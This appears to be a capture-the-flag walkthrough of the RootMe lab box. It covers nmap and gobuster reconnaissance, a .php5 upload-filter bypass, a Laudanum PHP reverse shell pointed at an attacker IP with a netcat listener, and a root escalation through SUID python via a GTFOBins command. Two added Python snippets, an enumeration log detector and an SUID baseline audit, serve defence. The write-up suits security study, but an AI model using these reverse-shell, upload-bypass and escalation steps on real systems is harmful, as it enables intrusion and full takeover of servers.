Task 1. Start the machine
Task 2. Reconnaissance
Scan the machine, how many ports are open?
Scan the target
# nmap -A -p- 10.x.x.x
Found 2 open ports: 22 and 80
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
What version of Apache is running?
From the nmap scan we can see that the Apache version is 2.4.29
What service is running on port 22?
From the scan output we can see that the service running on port 22 is SSH
Find directories on the web server using the GoBuster tool.
# gobuster -h
dir Uses directory/file enumeration mode
dns Uses DNS subdomain enumeration mode
fuzz Uses fuzzing mode
help Help about any command
s3 Uses aws bucket enumeration mode
version shows the current version
vhost Uses VHOST enumeration mode
--delay duration Time each thread waits between requests (e.g. 1500ms)
-h, --help help for gobuster
--no-error Don't display errors
-z, --no-progress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-p, --pattern string File containing replacement patterns
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
We will use the following switches.
-w : path to wordlist
-u : url
dir : directory bruteforce
# gobuster dir -u http://10.10.47.229 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 2> /dev/null
The scan returned five entries:
/uploads (Status: 301) [Size: 314] [--> http://10.10.47.229/uploads/]
/css (Status: 301) [Size: 310] [--> http://10.10.47.229/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.47.229/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.47.229/panel/]
/server-status (Status: 403) [Size: 277]
Status code 301: The HTTP response status code 301 Moved Permanently is used for permanent redirecting, meaning current links or records using the URL this response is received for should be updated.
Status code 403: The HTTP 403 Forbidden client error status response code indicates that the server understood the request but refuses to authorize it.
This status is similar to 401, but in this case, re-authenticating will make no difference. The access is permanently forbidden and tied to the application logic, such as insufficient rights to a resource.
The 2> /dev/null at the end redirects any errors (stderr) that occur during the scan to /dev/null so they do not clutter the output.
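Gobuster prints only the handful of paths that answered 301 or 403, but the web server's access log records every wordlist entry that came back 404. The following detection is added here as an example and is not part of the original writeup: it parses constructed Apache combined-format log lines and flags a client that probes many distinct missing paths.

```python
import re
from collections import defaultdict

# Constructed Apache combined-log lines modelled on what the server would record
# during the gobuster run: every wordlist entry that does not exist is a 404.
SAMPLE_LOG = """\
10.9.4.125 - - [20/Aug/2020:13:00:01 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.9.4.125 - - [20/Aug/2020:13:00:01 +0000] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.9.4.125 - - [20/Aug/2020:13:00:01 +0000] "GET /test HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.9.4.125 - - [20/Aug/2020:13:00:02 +0000] "GET /old HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.9.4.125 - - [20/Aug/2020:13:00:02 +0000] "GET /uploads HTTP/1.1" 301 314 "-" "gobuster/3.0.1"
10.9.4.125 - - [20/Aug/2020:13:00:02 +0000] "GET /panel HTTP/1.1" 301 312 "-" "gobuster/3.0.1"
10.9.4.125 - - [20/Aug/2020:13:00:03 +0000] "GET /server-status HTTP/1.1" 403 277 "-" "gobuster/3.0.1"
192.168.1.20 - - [20/Aug/2020:13:00:05 +0000] "GET /index.php HTTP/1.1" 200 1027 "-" "Mozilla/5.0"
192.168.1.20 - - [20/Aug/2020:13:00:06 +0000] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse_log(text):
    """Yield (ip, path, status) for every line that matches the format."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m["ip"], m["path"], int(m["status"])

def flag_enumeration(text, threshold=4):
    """Return {ip: distinct missing/forbidden paths} for clients whose count of
    distinct 404/403 paths reaches `threshold`. A browser fetching one missing
    favicon stays below it; a wordlist scan crosses it within seconds. The
    User-Agent is a weaker signal because the client can set it to anything."""
    misses = defaultdict(set)
    for ip, path, status in parse_log(text):
        if status in (403, 404):
            misses[ip].add(path)
    return {ip: sorted(paths) for ip, paths in misses.items() if len(paths) >= threshold}

if __name__ == "__main__":
    for ip, paths in flag_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {len(paths)} distinct probes, e.g. {paths[:3]}")
```

In production the threshold is tuned per site and counted within a sliding time window; the constant here only illustrates the rule on the sample.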
What is the hidden directory?
Task 3. Getting a Shell
Find a form to upload and get a reverse shell, and find the flag.
Search for “file upload bypass” and “PHP reverse shell”.
Before searching Google for what the hint mentions, I tried using the php-reverse-shell from the Laudanum collection that comes with Kali Linux. It can be found at the following path:
We need to edit the php-reverse-shell.php file.
Change the parameter $ip to your local machine ip and $port to any port that you know will not be blocked on your local machine.
Save and exit the document.
$VERSION = "1.0";
$ip = '10.10.139.4'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
Upload the file
Unfortunately, the website does not allow uploading .php files, so it is back to Google. It turns out we can trick the upload mechanism by renaming our file from .php to .php5: the filter checks for the .php extension but not .php5, and the server still executes .php5 as PHP.
After renaming, the file uploads successfully.
Getting the shell
Next we need to start netcat in order to catch the reverse shell. We will use the following command and switches.
# nc -lvnp 1234
-l listen mode, for inbound connects
-v verbose output
-n numeric-only IP addresses, no DNS
-p local port number
Once we have nc set up, it's time to run the reverse shell script.
We have successfully uploaded the shell to the server, so in order to execute it we need to navigate to the folder containing the uploaded file.
Going back to Gobuster's output, we found a directory named /uploads. Navigate to that directory; sure enough, the file is there. Click on the file and let's have a look at netcat.
# nc -vnlp 1234
listening on [any] 1234 ...
connect to [10.9.4.125] from (UNKNOWN) [10.10.139.4] 46402
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:14:58 up 27 min, 0 users, load average: 0.07, 0.02, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
We are in; now all that's left is to locate the flag. The file containing it is called user.txt.
A simple find command gives us the location.
$ find / -type f -name user.txt 2> /dev/null
$ cat /var/www/user.txt
Laudanum is a collection of injectable files, designed to be used in a pentest when upload vulnerabilities, administrative interfaces, and SQL injection flaws are found. These files are written in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.
Task 4. Privilege Escalation
Now that we have a shell, let’s escalate our privileges to root.
Search for files with SUID permission, which file is weird?
SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner.
If you create a script (owned by the root user) that needs the SUID bit set, you’d do so like:
$ sudo chmod u+s filename
To search for the files with SUID permission we can use the following command.
# find / -type f -user root -perm -4000 2>/dev/null
-perm search for files with the specified permissions
-type f search for files only (not directories)
2> /dev/null suppress errors
-user search for files owned by the specified user
From the output, one entry stands out: /usr/bin/python, an interpreter with the SUID bit set.
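Spotting the odd entry by eye works on a CTF box; on real hosts the defender's version of this step is a baseline diff. The following audit is added as an example and is not from the writeup: it does what the find command above does in Python, then reports SUID files that are not in a constructed baseline of expected binaries. EXPECTED_SUID and the throwaway tree built in self_check are assumptions made up for the example.

```python
import os
import stat
import tempfile

# Constructed baseline: SUID binaries expected on a stock install, as paths
# relative to the audited root. A real baseline is recorded from a known-good build.
EXPECTED_SUID = {"usr/bin/passwd", "usr/bin/sudo", "usr/bin/su"}

def find_suid(root):
    """Regular files under `root` with the SUID bit set, relative to `root`:
    the Python equivalent of `find / -type f -perm -4000 2>/dev/null`.
    Symlinks are not followed; unreadable entries are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)

def unexpected_suid(root, baseline=EXPECTED_SUID):
    """Entries that are SUID now but absent from the baseline, e.g. an interpreter
    such as usr/bin/python, which gives any local user a root shell on demand.
    Linux ignores the bit on interpreted scripts, so native binaries are what matter."""
    return [p for p in find_suid(root) if p not in baseline]

def self_check():
    """Build a throwaway tree: one baseline SUID binary, one rogue SUID interpreter,
    one ordinary binary; return what the audit flags."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "usr", "bin")
        os.makedirs(bindir)
        for name, mode in (("passwd", 0o4755), ("python", 0o4755), ("ls", 0o755)):
            path = os.path.join(bindir, name)
            with open(path, "wb") as fh:
                fh.write(b"\x7fELF")  # placeholder contents, not a real binary
            os.chmod(path, mode)
        return unexpected_suid(root)

if __name__ == "__main__":
    print(self_check())  # ['usr/bin/python']
```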
Find a form to escalate your privileges.
Search for gtfobins
Navigate to the SUID section, omit the first command.
$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
After that we have a shell running as root, so let's get the root.txt flag.
# find / -type f -name root.txt 2> /dev/null
# cat /root/root.txt